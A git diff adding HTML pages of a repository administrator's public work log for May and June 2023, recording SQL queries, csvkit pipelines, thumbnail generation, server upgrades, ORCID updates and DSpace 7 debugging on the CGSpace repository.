+</span></span><span style="display:flex;"><span>    dspace_object_id <span style="color:#66d9ef">IN</span> (
+</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">SELECT</span>
+</span></span><span style="display:flex;"><span>            dspace_object_id
+</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">FROM</span>
+</span></span><span style="display:flex;"><span>            metadatavalue
+</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">WHERE</span>
+</span></span><span style="display:flex;"><span>            metadata_field_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">28</span>
+</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">AND</span> place <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
+</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">AND</span> (text_value <span style="color:#66d9ef">LIKE</span> <span style="color:#e6db74">&#39;%No. of bitstreams: 1%&#39;</span>
+</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">AND</span> text_value <span style="color:#66d9ef">SIMILAR</span> <span style="color:#66d9ef">TO</span> <span style="color:#e6db74">&#39;%.(gif|jpg|jpeg)%&#39;</span>))
+</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">AND</span> metadata_field_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">220</span>) <span style="color:#66d9ef">TO</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>items<span style="color:#f92672">-</span><span style="color:#66d9ef">with</span><span style="color:#f92672">-</span><span style="color:#66d9ef">old</span><span style="color:#f92672">-</span>bitstreams.csv <span style="color:#66d9ef">WITH</span> CSV HEADER;
+</span></span></code></pre></div><ul>
+<li>I extract the DOIs and look them up on CrossRef to see which are CC-BY, then extract those:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c text_value /tmp/items-with-old-bitstreams.csv | sed 1d &gt; /tmp/dois.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/crossref_doi_lookup.py -i /tmp/dois.txt -e fuuu@example.com -o /tmp/dois-resolved.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c license -m <span style="color:#e6db74">&#39;creativecommons&#39;</span> /tmp/dois-resolved.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    | csvgrep -c license -m &#39;by-nc-nd&#39; --invert-match \
+</span></span><span style="display:flex;"><span>    | csvcut -c doi \
+</span></span><span style="display:flex;"><span>    | sed &#39;2,$s_^\(.*\)$_https://doi.org/\1_&#39; \
+</span></span><span style="display:flex;"><span>    | sed 1d &gt; /tmp/dois-for-cc-items-with-old-bitstreams.txt
+</span></span></code></pre></div><ul>
+<li>This results in 262 items that have DOIs that are CC-BY (but not ND)
+<ul>
+<li>This is a good starting point, but misses some that had low-quality thumbnails uploaded after they were added (ie, there&rsquo;s no record of a bitstream in the provenance field)</li>
+</ul>
+</li>
+<li>I ran the list through my Sci-Hub download script and filtered out a few that downloaded invalid PDFs (manually), then generated thumbnails for all of them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ~/src/git/DSpace/ilri/get_scihub_pdfs.py -i /tmp/dois-for-cc-items-with-old-bitstreams.txt -o bitstreams.csv
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> vipsthumbnail *.pdf --export-profile srgb -s 600x600 -o <span style="color:#e6db74">&#39;./%s.pdf.jpg[Q=02,optimize_coding,strip]&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then I joined the CSVs on the DOI column, filtered out any that we didn&rsquo;t find PDFs for, and formatted the resulting CSV with an id, filename, and bundle column:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvjoin -c doi bitstreams.csv /tmp/items-with-old-bitstreams.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>    | csvgrep -c filename --invert-match -r &#39;^$&#39; \
+</span></span><span style="display:flex;"><span>    | sed &#39;1s/dspace_object_id/id/&#39; \
+</span></span><span style="display:flex;"><span>    | csvcut -c id,filename \
+</span></span><span style="display:flex;"><span>    | sed -e &#39;1s/^\(.*\)$/\1,bundle/&#39; -e &#39;2,$s/^\(.*\)$/\1.jpg__description:libvips thumbnail,THUMBNAIL/&#39; &gt; new-thumbnails.csv
+</span></span></code></pre></div><ul>
+<li>I did a dry run with <code>ilri/post_bitstreams.py</code> and it seems that most (all?) already have thumbnails from the last time I did a massive Sci-Hub check
+<ul>
+<li>So relying on the provenance field is not very reliable it seems, and that was a waste of two hours&hellip;</li>
+<li>I did discover, while originally posting WebP thumbnails, that the format doesn&rsquo;t seem to be set correctly when uploading WebP via the REST API, but it does work when uploading via XMLUI—the format is set to Unknown</li>
+<li>POSTing a JPG to the THUMBNAIL bundle sets the format to JPEG&hellip;</li>
+<li>I am guessing that is a bug that I won&rsquo;t bother troubleshooting since the DSpace 6.x REST API is deprecated</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-05-27">2023-05-27</h2>
+<ul>
+<li>Export CGSpace to check for missing Initiative collection mappings
+<ul>
+<li>Then I also ran the csv-metadata-quality tool on the Initiatives to do some easy fixes like country/region mapping and whitespace fixes</li>
+</ul>
+</li>
+<li>Start a havest on AReS</li>
+</ul>
+<h2 id="2023-05-29">2023-05-29</h2>
+<ul>
+<li>Re-create my local PostgreSQL 14 container:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman rm dspacedb14
+</span></span><span style="display:flex;"><span>$ podman pull docker.io/postgres:14-alpine
+</span></span><span style="display:flex;"><span>$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d docker.io/postgres:14-alpine -c shared_buffers<span style="color:#f92672">=</span>1024MB -c random_page_cost<span style="color:#f92672">=</span>1.1
+</span></span></code></pre></div><ul>
+<li>Export CGSpace again to do some major cleanups in OpenRefine
+<ul>
+<li>I found a few countries that are in the ISO 3166-1 and UN M.49 lists, but not in ours so I added them to the list in <code>input-forms.xml</code> and regenerated the controlled vocabularies for the CGSpace Submission Guidelines</li>
+<li>There were a handful of issues with ISSNs, ISBNs, DOIs, access status, licenses, and missing CGIAR Trust Fund donors for Initiatives outputs</li>
+<li>This was about 455 items</li>
+</ul>
+</li>
+<li>Helping the Alliance web team understand the DSpace REST API for determining which collection an item belongs to</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023-06/index.html b/docs/2023-06/index.html
new file mode 100644
index 000000000..421637f84
--- /dev/null
+++ b/docs/2023-06/index.html
@@ -0,0 +1,500 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2023" />
+<meta property="og:description" content="2023-06-02
+
+Spend some time testing my post_bitstreams.py script to update thumbnails for items on CGSpace
+
+Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;
+
+
+Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+
+They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
+From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-06/" />
+<meta property="article:published_time" content="2023-06-02T10:29:36+03:00" />
+<meta property="article:modified_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2023"/>
+<meta name="twitter:description" content="2023-06-02
+
+Spend some time testing my post_bitstreams.py script to update thumbnails for items on CGSpace
+
+Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;
+
+
+Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+
+They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
+From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-06/",
+  "wordCount": "1877",
+  "datePublished": "2023-06-02T10:29:36+03:00",
+  "dateModified": "2023-07-01T17:17:31+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-06/">
+
+    <title>June, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-06/">June, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-06-02T10:29:36+03:00">Fri Jun 02, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-06-02">2023-06-02</h2>
+<ul>
+<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace
+<ul>
+<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li>
+</ul>
+</li>
+<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+<ul>
+<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li>
+<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-04">2023-06-04</h2>
+<ul>
+<li>Upgrade CGSpace to Ubuntu 22.04
+<ul>
+<li>The upgrade was mostly normal, but I had to unhold the openjdk package in order for <code>do-release-upgrade</code> to run:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
+</span></span></code></pre></div><ul>
+<li>In <a href="/cgspace-notes/2022-11/">2022-11</a> an upstream Java update broke the DSpace 6 Handle server so we will have to pin this again after the upgrade to Ubuntu 22.04</li>
+<li>After the upgrade I made sure CGSpace was working, then proceeded to upgrade PostgreSQL from 12 to 14, like I did on <a href="/cgspace-notes/2023-03/">DSpace Test in 2023-03</a></li>
+<li>Then I had to downgrade OpenJDK to fix the Handle server using the ones I had previously downloaded for Ubuntu 20.04 because they no longer exist on Launchpad:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># dpkg -i openjdk-8-j*8u342-b07*.deb
+</span></span></code></pre></div><ul>
+<li>Export CGSpace to fix missing Initiative collection mappings</li>
+<li>Start a harvest on AReS</li>
+<li>Work on the DSpace 7 migration a bit more
+<ul>
+<li>I decided to rebase and drop all the submission form edits because they conflict every time upstream changes!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-06">2023-06-06</h2>
+<ul>
+<li>Fix some incorrect ORCID identifiers for an Alliance author on CGSpace</li>
+<li>Export our list of ORCID identifiers, resolve them, and update the records in CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv| grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort -u &gt; /tmp/2023-06-06-orcids.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve_orcids.py -i /tmp/2023-06-06-orcids.txt -o /tmp/2023-06-06-orcids-names.txt -d
+</span></span><span style="display:flex;"><span>$ ./ilri/update_orcids.py -i /tmp/2023-06-06-orcids-names.txt -db dspacetest -u dspace -p <span style="color:#e6db74">&#39;ffff&#39;</span> -m <span style="color:#ae81ff">247</span>
+</span></span></code></pre></div><ul>
+<li>Start working on updating the MODS schema in CGSpace from 3.1 to 3.8 based on Stefano and Salem&rsquo;s work last year</li>
+</ul>
+<h2 id="2023-06-08">2023-06-08</h2>
+<ul>
+<li>Continue working on the MODS schema mapping</li>
+<li>Export CGSpace to check and update <code>dcterms.extent</code> fields
+<ul>
+<li>I normalized about 1,500 to use either &ldquo;p. 1-6&rdquo; or &ldquo;5 p.&rdquo; format</li>
+<li>Also, I used this GREL expression to extract missing pages from the citation field: <code>cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*(pp?\.\s?\d+[-–]\d+).*/)[0]</code></li>
+<li>This was over 4,000 items with a format like &ldquo;p. 1-6&rdquo; and &ldquo;pp. 1-6&rdquo; in the citation</li>
+<li>I used another GREL expression to extract another 5,000: <code>cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*?(\d+\s+?[Pp]+\.).*/)[0]</code></li>
+<li>This was for the format like &ldquo;1 p.&rdquo; (note we had to protect against the greedy <code>.*</code> in the beginning)</li>
+</ul>
+</li>
+<li>I also did some work to capture a handful of missing DOIs and ISSNs, but it was only about 100 items and I will have to wait until the 10,000+ above finish importing</li>
+</ul>
+<h2 id="2023-06-09">2023-06-09</h2>
+<ul>
+<li>I see there are ~200 users in CGSpace that have registered with their CGIAR email address using a password as opposed to using Active Directory:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">SELECT</span> <span style="color:#f92672">*</span> <span style="color:#66d9ef">FROM</span> eperson <span style="color:#66d9ef">WHERE</span> email <span style="color:#66d9ef">LIKE</span> <span style="color:#e6db74">&#39;%cgiar.org&#39;</span> <span style="color:#66d9ef">AND</span> netid <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">AND</span> password <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
+</span></span></code></pre></div><ul>
+<li>I am wondering if I should delete their passwords and tell them use log in using LDAP
+<ul>
+<li>As an initial test I will reset a few accounts including my own that have passwords and salts:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> eperson <span style="color:#66d9ef">SET</span> password<span style="color:#f92672">=</span><span style="color:#66d9ef">DEFAULT</span>,salt<span style="color:#f92672">=</span><span style="color:#66d9ef">DEFAULT</span>,digest_algorithm<span style="color:#f92672">=</span><span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">WHERE</span> netid <span style="color:#66d9ef">IN</span> (<span style="color:#e6db74">&#39;axxxx&#39;</span>, <span style="color:#e6db74">&#39;axxxx&#39;</span>, <span style="color:#e6db74">&#39;bxxxx&#39;</span>);
+</span></span></code></pre></div><ul>
+<li>I also decided to reset passwords/salts for CGIAR accounts that have not been active since 2021 (1.5 years ago):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> eperson  <span style="color:#66d9ef">SET</span> password<span style="color:#f92672">=</span><span style="color:#66d9ef">DEFAULT</span>,salt<span style="color:#f92672">=</span><span style="color:#66d9ef">DEFAULT</span>,digest_algorithm<span style="color:#f92672">=</span><span style="color:#66d9ef">DEFAULT</span> <span style="color:#66d9ef">WHERE</span> email <span style="color:#66d9ef">LIKE</span> <span style="color:#e6db74">&#39;%cgiar.org&#39;</span> <span style="color:#66d9ef">AND</span> netid <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">AND</span> password <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">AND</span> salt <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">AND</span> last_active <span style="color:#f92672">&lt;</span> <span style="color:#e6db74">&#39;2022-01-01&#39;</span>::date;
+</span></span></code></pre></div><ul>
+<li>This was about 100 accounts&hellip;
+<ul>
+<li>I will wait some more time before I decide what to do about the more current ones</li>
+</ul>
+</li>
+<li>Add a few more ORCID identifiers to my list and tag them on CGSpace</li>
+</ul>
+<h2 id="2023-06-10">2023-06-10</h2>
+<ul>
+<li>Export CGSpace to check for missing Initiative mappings
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-11">2023-06-11</h2>
+<ul>
+<li>File <a href="https://github.com/DSpace/DSpace/issues/8900">an issue</a> on DSpace for the <code>Content-Disposition</code> bug causing images to get downloaded instead of opened inline</li>
+</ul>
+<h2 id="2023-06-12">2023-06-12</h2>
+<ul>
+<li>Export CGSpace to do some more work extracting volume and issue from citations for items where they are missing
+<ul>
+<li>I found and fixed over 7,000!</li>
+<li>Then I found and extracted another 7,000 items with no extents (pages)</li>
+<li>Then I replaced all occurences of en dashes for ranges in pages with regular hyphens</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-13">2023-06-13</h2>
+<ul>
+<li>Last night I finally figured out how to do basic overrides to the simple item view in Angular</li>
+<li>Add a handful of new ORCID identifiers to my list and tag them on CGSpace</li>
+<li>Extract a list of all the proposed actions for CG Core output types and create a <a href="https://github.com/AgriculturalSemantics/cg-core/issues/45">new issue for them on CG Core&rsquo;s GitHub repository</a></li>
+<li>Extract a list of all the proposed actions for CG Core output types for MARLO and create <a href="https://github.com/CCAFS/MARLO/issues/2479">a new issue for them on MARLO&rsquo;s GitHub repository</a></li>
+<li>Meeting with Indira, Ryan, and Abenet to discuss plans for the DSpace 7 focus group</li>
+</ul>
+<h2 id="2023-06-14">2023-06-14</h2>
+<ul>
+<li>Did some more work on the DSpace 7 Test to improve the submission forms and the look and feel</li>
+<li>Extract a list of all the proposed actions for CG Core output types for MEL and create <a href="https://github.com/CodeObia/MEL/issues/11216">a new issue for them on MEL&rsquo;s GitHub repository</a></li>
+<li>I filed <a href="https://github.com/DSpace/dspace-angular/issues/2309">an issue about the yarn merge-i18n script</a></li>
+<li>I made <a href="https://github.com/DSpace/dspace-angular/pull/2306">a pull request for some Finnish language i18n strings</a></li>
+<li>I made <a href="https://github.com/DSpace/dspace-angular/pull/2306">a pull request to lint the i18n en.json5 file</a></li>
+</ul>
+<h2 id="2023-06-15">2023-06-15</h2>
+<ul>
+<li>A lot more work on DSpace 7
+<ul>
+<li>I tested some pull requests and worked on the style of the item view and homepage</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-16">2023-06-16</h2>
+<ul>
+<li>A lot more work on DSpace 7
+<ul>
+<li>I made <a href="https://github.com/DSpace/dspace-angular/pull/2316">a pull request to adjust font weight in item counts </a></li>
+<li>I made <a href="https://github.com/DSpace/dspace-angular/pull/2317">a pull request to update the ESLint configuration for JSON5</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-17">2023-06-17</h2>
+<ul>
+<li>Export CGSpace to check for missing Initiative collection mappings
+<ul>
+<li>I also spent some time doing sanity checks on countries, regions, DOIs, and more</li>
+</ul>
+</li>
+<li>I lowercased all our AGROVOC keywords in <code>dcterms.subject</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">BEGIN</span>;
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">BEGIN</span>
+</span></span><span style="display:flex;"><span>dspace<span style="color:#f92672">=*#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> text_value<span style="color:#f92672">=</span><span style="color:#66d9ef">LOWER</span>(text_value) <span style="color:#66d9ef">WHERE</span> dspace_object_id <span style="color:#66d9ef">IN</span> (<span style="color:#66d9ef">SELECT</span> uuid <span style="color:#66d9ef">FROM</span> item) <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">187</span> <span style="color:#66d9ef">AND</span> text_value <span style="color:#f92672">~</span> <span style="color:#e6db74">&#39;[[:upper:]]&#39;</span>;
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">2392</span>
+</span></span><span style="display:flex;"><span>dspace<span style="color:#f92672">=*#</span> <span style="color:#66d9ef">COMMIT</span>;
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">COMMIT</span>
+</span></span></code></pre></div><ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-06-19">2023-06-19</h2>
+<ul>
+<li>Today I started getting an error on DSpace 7 Test
+<ul>
+<li>The page loads, and then when it is almost done it goes blank to white with this in the console:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>ERROR DOMException: CSSStyleSheet.cssRules getter: Not allowed to access cross-origin stylesheet
+</span></span></code></pre></div><ul>
+<li>I restarted Angular, but it didn&rsquo;t fix it</li>
+<li>The <code>yarn test:rest</code> script shows everything OK, and I haven&rsquo;t changed anything recently&hellip;</li>
+<li>I re-compiled the Angular UI using the default theme and it was the same&hellip;</li>
+<li>I tried in Firefox Nightly and it works&hellip;
+<ul>
+<li>So it must be something related to the browser</li>
+<li>I tried clearing all the session storage / cookies and refreshing and it worked</li>
+</ul>
+</li>
+<li>I switched back to the CGSpace theme and it happened again
+<ul>
+<li>I had a hunch it might be due to the GDPR cookie plugin in my browser, so I disabled that and then refreshed and it worked&hellip; hmmm</li>
+</ul>
+</li>
+<li>Upload thumbnails for about 42 IITA Journal Articles after resolving their DOIs and making sure they were not CC ND
+<ul>
+<li>I fixed a few bugs in <code>get_scihub_pdfs.py</code> in the process</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-21">2023-06-21</h2>
+<ul>
+<li>Stefano got back to me about the MODS OAI-PMH schema test on DSpace Test
+<ul>
+<li>He said that it&rsquo;s fine if we use iso8601 encoding for dates instead of w3cdtf and asked if we can create a custom end point for AGRIS that only includes types like Journal Articles similar to how Salem did it: <a href="https://melspace.loc.codeobia.com/oai/agris?verb=ListRecords&amp;metadataPrefix=mods">https://melspace.loc.codeobia.com/oai/agris?verb=ListRecords&amp;metadataPrefix=mods</a></li>
+<li>I updated DSpace Test with the new date format and said I&rsquo;d work on the custom AGRIS set</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-25">2023-06-25</h2>
+<ul>
+<li>Export CGSpace to check for missing Initiative collection mappings</li>
+<li>I wanted to start a harvest on AReS but I&rsquo;ve seen the load on the server high for a few days and I&rsquo;m not sure what it is
+<ul>
+<li>I decided to run all updates and reboot it since it&rsquo;s Sunday anyway</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-06-26">2023-06-26</h2>
+<ul>
+<li>Since the new DSpace 7 will respect newlines in metadata fields I am curious to see how many of our abstracts have poor newlines
+<ul>
+<li>I exported CGSpace and used a custom text facet with this GREL expression in OpenRefine to count the number of newlines in each cell:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.split(&#39;\n&#39;).length()
+</span></span></code></pre></div><ul>
+<li>Also useful to check for general length of the text in the cell to make sure it&rsquo;s a reasonably long string
+<ul>
+<li>I spent some time trying to find a pattern that I could use to identify &ldquo;easy&rdquo; targets, but there are so many exceptions that it will have to be done manually</li>
+<li>I fixed a few dozen</li>
+</ul>
+</li>
+<li>Do a bit of work on thumbnails on CGSpace</li>
+<li>I&rsquo;m trying to troubleshoot the Discovery error I get on DSpace 7:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>java.lang.NullPointerException: Cannot invoke &#34;org.dspace.discovery.configuration.DiscoverySearchFilterFacet.getIndexFieldName()&#34; because the return value of &#34;org.dspace.content.authority.DSpaceControlledVocabularyIndex.getFacetConfig()&#34; is null
+</span></span></code></pre></div><ul>
+<li>I reverted to the default <code>submission-forms.xml</code> and the <code>getFacetConfig()</code> error goes away&hellip;</li>
+<li>Kill some long-held locks on CGSpace PostgreSQL, as some users are complaining of slowness in archiving</li>
+<li>I did some testing of the LDAP login issue related to groupmaps
+<ul>
+<li>It does seem to be a regression from the <a href="https://github.com/DSpace/DSpace/pull/8814">LDAP auth patch</a> from last month, so I <a href="https://github.com/DSpace/DSpace/issues/8920">filed an issue</a></li>
+</ul>
+</li>
+<li>I spent some time on working on Angular and I figured out how to add a custom Angular component to show the UN SDG Goal icons on DSpace 7</li>
+</ul>
+<h2 id="2023-06-27">2023-06-27</h2>
+<ul>
+<li>I debugged the NullPointerException and somehow it disappeared
+<ul>
+<li>It seems to be related to the external controlled vocabularies in the submission form</li>
+<li>I removed them all, then added them all back, and now the issue is solved&hellip; hmmmm</li>
